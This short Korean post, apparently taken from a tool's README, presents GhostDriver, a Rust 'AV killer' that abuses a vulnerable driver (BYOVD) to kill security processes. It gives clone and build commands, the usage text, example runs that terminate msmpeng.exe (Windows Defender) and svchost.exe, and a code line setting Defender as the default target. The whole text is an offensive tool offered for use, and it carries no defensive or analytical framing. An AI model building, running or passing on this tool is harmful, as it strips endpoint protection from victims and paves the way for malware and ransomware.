
BYOVD를 사용하는 또 다른 AV 킬러 도구
GhostDriver는 BYOVD를 사용하는 Rust 기반 AV 킬러 도구입니다.
git clone https://github.com/BlackSnufkin/GhostDriver.gitcargo build --release --target=x86_64-pc-windows-msvcGhostDriver.exe 2.0
BlackSnufkin
Kills processes by name using a Ghost Driver
USAGE:
GhostDriver.exe [FLAGS] [OPTIONS]
FLAGS:
-h, --help Prints help information
-v, --version Prints version information
OPTIONS:
-n, --name=process_names
EXAMPLES:
.\GhostDriver.exe -n msmpeng.exe,svchost.exe
.\GhostDriver.exe --name msmpeng.exe
.\GhostDriver.exe (uses default processes)
// Define default process names
let default_process_names = vec!["msmpeng.exe"];
